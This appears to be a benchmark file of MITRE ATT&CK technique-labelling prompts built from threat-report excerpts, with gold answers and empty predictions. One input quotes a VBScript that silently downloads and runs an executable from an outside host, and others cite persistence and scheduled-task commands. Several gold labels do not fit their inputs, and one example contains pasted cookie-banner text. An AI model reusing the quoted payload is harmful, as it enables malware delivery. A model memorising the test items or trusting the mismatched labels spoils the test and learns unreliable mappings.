Run Keys / Startup Folder\n- Text: This turned out to be the best solution, as the Cobalt group set up a controlled botnet in the bank's network which was very difficult to track and even harder to stop. Initially the Cobalt group focused on jackpotting ATMs: they launched a program that sent commands directly to the dispenser to issue cash. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: BoxCaon established persistence by setting the \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\load\" registry key to point to its executable.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nestablishes persistence by creating a shortcut in the Start Menu folder.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gamaredon Group has used obfuscated PowerShell scripts for staging.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: In this case, a Cobalt Strike DLL file was sent through Bazar C2 traffic and saved to the infected Windows host under the user\u2019s AppData\\Roaming directory\n\t - T1564.003: Hide Artifacts - Hidden Window\n- Text: TA505 has used VBS for code execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", "input": "\nThe webpage contained both CVE-2014-6332 exploit code and a VBScript that invoked PowerShell on the affected users\u2019 system to download the below payload: \u00a0\u00a0\u00a0 function runmumaa() \u00a0\u00a0\u00a0 On Error Resume Next \u00a0\u00a0\u00a0 set shell=createobject(\"Shell.Application\") \u00a0\u00a0\u00a0 shell.ShellExecute \"powershell.exe\",\"-NoLogo -NoProfile \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 -NonInteractive -WindowStyle Hidden ( New-Object \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \u201cSystem.Net.WebClient\u201d).DownloadFile(\u201chttp://www.playboysplus.com\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 /install/install.exe\u201d,\u201dinstall.exe\u201d);Invoke-Item install.exe\", \"\", \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0 \"open\", 1 \u00a0\u00a0\u00a0 end function The CVE-2014-6332 exploit code seen in this incident is derived from the code published at http://www.exploit-db.com/exploits/35230/, which has also been incorporated in the Metasploit project", "gold": "- T1055.012: Process Injection - Process Hollowing\n- T1036: Masquerading\n- T1068: Exploitation for Privilege Escalation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.\n\t - T1070.006: Indicator Removal - Timestomp\n- Text: Finally, the Trojan creates a scheduled task to run itself every three minutes by running the following command on the command prompt after replacing the %path% string with the path to the srvResesponded.vbs VBScript:SchTasks /Create /SC MINUTE /MO 3 /TN \u201cInetlSecurityAssistManager\u201d /TR \u201cwscript %path%\u201d /f The Trojan uses HTTP to communicate with its C2 server, specifically using the InternetExplorer application object within an embedded Microsoft .NET Framework assembly called Interop.SHDocVw\n\t - T1071: Application Layer Protocol\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: The scripts create scheduled tasks and also retrieve, decode, and execute a copy of Revenge RAT\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\nhas used scheduled task raw XML with a backdated timestamp of June 2, 2016.", "gold": "- T1070.006: Indicator Removal - Timestomp", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT39 used secure shell (SSH) to move laterally among their targets.\n\t - T1021.004: Remote Services - SSH\n- Text: During Operation CuckooBees, the threat actors enabled WinRM over HTTP/HTTPS as a backup persistence mechanism using the following command: `cscript //nologo \"C:\\Windows\\System32\\winrm.vbs\" set winrm/config/service@{EnableCompatibilityHttpsListener=\"true\"}`.\n\t - T1133: External Remote Services\n", "input": "\nBy running SSH on the server in a compromised network, attackers can come back to the network whenever they want", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The URIs used in the HTTP requests are randomly generated\n\t - T1071: Application Layer Protocol\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the\u00a0Whois Anchor Panda blog post\n\t - T1102.002: Web Service - Bidirectional Communication\n- Text: 1) Communicate with the C2, try to forward ports with UPnP and determine available ports and report them to the C2. The usual C2 communication protocol used here is HTTP POST RC4-ciphered JSON data. Instead of saving the downloaded file, QakBot measures the download speed and deletes the received file. 3) Set up external PROXY-C2 connection that was received with command 37 (update config)/module 274 (proxy) by the stager\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nIt then sends the following IRC commands: NICK bxphzrjbxp USER bxphzrjbxp bxphzrjbxp bxphzrjbxp bxphzrjbxp To make sure it connected to the correct server, the Trojan checks for the message sent from the IRC server after the bot connects: Welcome to the MpkNet IRC Network The MPK bot does not join a specific IRC channel, instead sending private messages (PRIVMSG) to a user with the nick \u201cmpk\u201d", "gold": "- T1132: Data Encoding", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.\n\t - T1012: Query Registry\n- Text: Just like in the sandbox checks, the Trojan checks for an attached debugger each time it issues a DNS query; if it does detect a debugger it will issue a DNS query to resolve 676f6f646c75636b.gogle[.]co\n\t - T1518.001: Software Discovery - Security Software Discovery\n\t - T1124: System Time Discovery\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Remcos searches for Sandboxie and VMware on the system.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n", "input": "\nhas used Registry keys to detect and avoid executing in potential sandboxes.", "gold": "- T1518.001: Software Discovery - Security Software Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attor has automatically collected data about the compromised system.\n\t - T1119: Automated Collection\n- Text: Tropic Trooper has monitored files' modified time.\n\t - T1083: File and Directory Discovery\n- Text: Most modifications of Trojan.Win32.Waldek are distributed via removable media and include functionality to collect information on infected systems and send it to the attackers. Based on the system data collected, the attackers create packages of additional malware to be installed on the infected system using the relevant Waldek functionality.\n\t - T1025: Data from Removable Media\n\t - T1543: Create or Modify System Process\n\t - T1005: Data from Local System\n\t - T1091: Replication Through Removable Media\n", "input": "\ndeveloped a file stealer to search C:\\ and collect files with certain extensions. also executed a script to enumerate all drives, store them as a list, and upload generated files to the C2 server.", "gold": "- T1119: Automated Collection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: gh0st RAT has used Zlib to compress C2 communications data before encrypting it.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.\n\t - T1027: Obfuscated Files or Information\n- Text: During Operation Honeybee, malicious files were decoded prior to execution.\n\t - T1140: Deobfuscate/Decode Files or Information\n", "input": "\ndrops files with base64-encoded data.", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: creates a new service named \u201cntssrv\u201d to execute the payload.\n\t - T1569.002: System Services - Service Execution\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: HyperBro has the ability to start and stop a specified service.\n\t - T1569.002: System Services - Service Execution\n- Text: Consent - Details - [#IABV2SETTINGS#] - About This website uses cookies . We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you\u2019ve provided to them or that they\u2019ve collected from your use of their services. This is beneficial for the website, in order to make valid reports on the use of their website.Expiry: PersistentType: HTMLrc::cThis cookie is used to distinguish between humans and bots. Expiry: SessionType: HTMLKaspersky Lab2Learn more about this providertest\u00a0[x2]Used to detect if the visitor has accepted the marketing category in the cookie banner. This is used in context with the email marketing service Marketo.com, which allows the website to target visitors via email. Kaspersky Lab products detect the different artifacts used in this campaign with the following verdicts: Trojan.Win32.Generic, Trojan-Downloader.Win32.Upatre and Backdoor.Win32.HyperBro. Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor (also known as EmissaryPanda and APT27). Also the C2 domain update.iaacstudio[.]com was previously used in their campaigns. Regarding Metasploit\u2019s shikata_ga_nai encoder \u2013 although it\u2019s available for everyone and couldn\u2019t be the basis for attribution, we know this encoder has been used by LuckyMouse previously. Even when we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we can\u00b4t prove they were related to this particular attack. The main C2 used in this campaign is bbs.sonypsps[.]com, which resolved to IP-address, that belongs to the Ukrainian ISP network, held by a Mikrotik router using firmware version 6.34.4 (from March 2016) with SMBv1 on board\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n", "input": "\nlaunches a DLL file that gets executed as a service using svchost.exe", "gold": "- T1569.002: System Services - Service Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process.\n\t - T1047: Windows Management Instrumentation\n- Text: Lucifer can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected.\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: Bumblebee has the ability to perform anti-virtualization checks.\n\t - T1497: Virtualization/Sandbox Evasion\n", "input": "\nThe specific sandbox checks include: Using WMI to check BIOS version (SMBIOSBIOSVERSION) for VBOX, bochs, qemu, virtualbox and vm", "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks\n- T1497: Virtualization/Sandbox Evasion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Strider has used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.\n\t - T1090.001: Proxy - Internal Proxy\n- Text: HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure.\n\t - T1090: Proxy\n- Text: menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim.\n\t - T1090.002: Proxy - External Proxy\n", "input": "\nhas used local servers with both local network and Internet access to act as internal proxy nodes to exfiltrate data from other parts of the network without direct Internet access.", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Mustang Panda has downloaded additional executables following the initial infection stage.\n\t - T1105: Ingress Tool Transfer\n- Text: can load a DLL using the LoadLibrary API.\n\t - T1129: Shared Modules\n- Text: leverages legitimate social networking sites and cloud platforms (Twitter, Yandex, and Mediafire) for command and control communications.\n\t - T1102: Web Service\n", "input": "\ndownloads additional plug-ins to load on the victim\u2019s machine, including the ability to upgrade and replace its own binary.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HD Creates a file in the Temp path and names it \u201chd\u201d + PCID then invokes another program module named hd.test1 to identify logical drives\n\t - T1083: File and Directory Discovery\n- Text: The Gamaredon group uses a package that includes a custom Microsoft Outlook Visual Basic for Applications (VBA) project. Using Outlook macros to deliver malware is something we rarely see while investigating malicious campaigns\n\t - T1106: Native API\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1120: Peripheral Device Discovery\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: During Operation Wocao, threat actors discovered network disks mounted to the system using netstat.\n\t - T1135: Network Share Discovery\n", "input": "\nCommand Description !Dir Lists the contents of a specified directory !Drives Enumerates the storage drives attached to the system and their respective type", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: has downloaded additional code and files from servers onto victims.\n\t - T1105: Ingress Tool Transfer\n- Text: Magic Hound has used PowerShell for execution and privilege escalation.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. UNC2465 also uses the publicly available NGROK utility to bypass firewalls and expose remote desktop service ports, like RDP and WinRM, to the open internet. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note\n\t - T1102: Web Service\n", "input": "\nhas the capability to download files to execute on the victim\u2019s machine.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DLL side-loading has been used to execute through a legitimate Citrix executable ssonsvr.exe which is vulnerable to the technique. The Citrix executable was dropped along with by the dropper.\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: Remsec can perform DLL injection.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: The implant receives HTTP-based commands from a control server and parses the HTTP Content-Type and Content-Length from the HTTP header. If the HTTP Content-Type matches the following value, then the implant executes the command specified by the control server\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nHunter queried the following URIs in a specific order to determine if the associated software configurations are insecure, and all queries contained the HttpClient User-Agent: GET /manager/html/ \u2014 Tomcat web application manager GET /jmx-console/ \u2014 JBoss configuration GET /CFIDE/administrator/login.cfm \u2014 ColdFusion configuration Installation TG-3390 uses DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL", "gold": "- T1574.002: Hijack Execution Flow - DLL Side-Loading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger\n\t - T1047: Windows Management Instrumentation\n\t - T1497.001: Virtualization/Sandbox Evasion - System Checks\n- Text: can list the running processes and get the process ID and parent process\u2019s ID.\n\t - T1057: Process Discovery\n- Text: APT33 has attempted to use WMI event subscriptions to establish persistence on compromised hosts.\n\t - T1546.003: Event Triggered Execution - Windows Management Instrumentation Event Subscription\n", "input": "\nuses WMI to perform process monitoring.", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HighShell v5.0 explorer tab allows actor to navigate the file system The HighShell v7.1 variant from the data dump contains similar functionality to its predecessors and continued the tabular approach but expanded even further by splitting out the main functionality across multiple tabs, specifically \u201cCommand\u201d, \u201cExplorer\u201d, \u201cUpload\u201d, \u201cDownload\u201d, \u201cSql Server\u201d and \u201cChange Time\u201d\n\t - T1105: Ingress Tool Transfer\n- Text: Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration Exfiltration is done through the bitsadmin.exe utility\n\t - T1113: Screen Capture\n\t - T1115: Clipboard Data\n\t - T1560: Archive Collected Data\n\t - T1132: Data Encoding\n\t - T1486: Data Encrypted for Impact\n- Text: Once the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to the address, it uses a hardcoded one\n\t - T1565.002: Data Manipulation - Transmitted Data Manipulation\n", "input": "\nHijack Clipboard Bitcoin Address Zyklon has the ability to hijack the clipboard, and replaces the user\u2019s copied bitcoin address with an address served up by the actor\u2019s control server", "gold": "- T1115: Clipboard Data\n- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: creates a suspended svchost process and injects its DLL into it.\n\t - T1055: Process Injection\n- Text: Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n- Text: RCSession can launch itself from a hollowed svchost.exe process.\n\t - T1055.012: Process Injection - Process Hollowing\n", "input": "\nThe payload then calls the VirtualAllocEx API to create a buffer in the newly hollowed process and the WriteProcessMemory API to write the supplied data buffer that contains the code to inject to this newly created buffer", "gold": "- T1106: Native API", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Operation Wocao's backdoors have been written in Python and compiled with py2exe.\n\t - T1059.006: Command and Scripting Interpreter - Python\n- Text: APT38 has used PowerShell to execute commands and other operational tasks.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Cardinal RAT and its watchdog component are compiled and executed after being delivered to victims as embedded, uncompiled source code.\n\t - T1027.004: Obfuscated Files or Information - Compile After Delivery\n", "input": "\nCan be packed into a single .py file and run without any dependencies other than the python standard library on all OSes", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Axiom group has used other forms of obfuscation, include commingling legitimate traffic with communications traffic so that network streams appear legitimate.\n\t - T1001: Data Obfuscation\n- Text: Squirrelwaffle has encoded its communications to C2 servers using Base64.\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: InvisiMole can use a modified base32 encoding to encode data within the subdomain of C2 requests.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n", "input": "\nencodes C2 communications with base64.", "gold": "- T1001: Data Obfuscation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects the victim's IP address.\n\t - T1016: System Network Configuration Discovery\n- Text: GoldFinder performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: When checking network connection with the \u201cnetstat\u201d command, both cases use the \u201c-naop\u201d option in conjunction with the \u201ctcp\u201c - Filtering the result, both cases use the \u201cfindstr\u201d command instead of \u201cfind\n\t - T1049: System Network Connections Discovery\n", "input": "\ncan be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: TA505 has leveraged \"rundll32.exe\" to execute malicious DLLs.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: When running on Windows 7, the malicious library uses the Metasploit Framework\u2019s open-source code Win7Elevate to inject malicious code into explorer.exe\n\t - T1055: Process Injection\n- Text: A Lazarus Group malware sample performs reflective DLL injection.\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n", "input": "\nuses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode.", "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aoqin Dragon has used the Themida packer to obfuscate malicious payloads.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: To operate and evade standard analysis tools, most of the functions are hashed. The hashing algorithm has a high degree of similarity to the previous ShellTea version, with a slight modification of the seeds and constants. In this version, the attacker also utilizes functions from ole32 for stream processing\n\t - T1027: Obfuscated Files or Information\n- Text: Dtrack has used a dropper that embeds an encrypted payload as extra 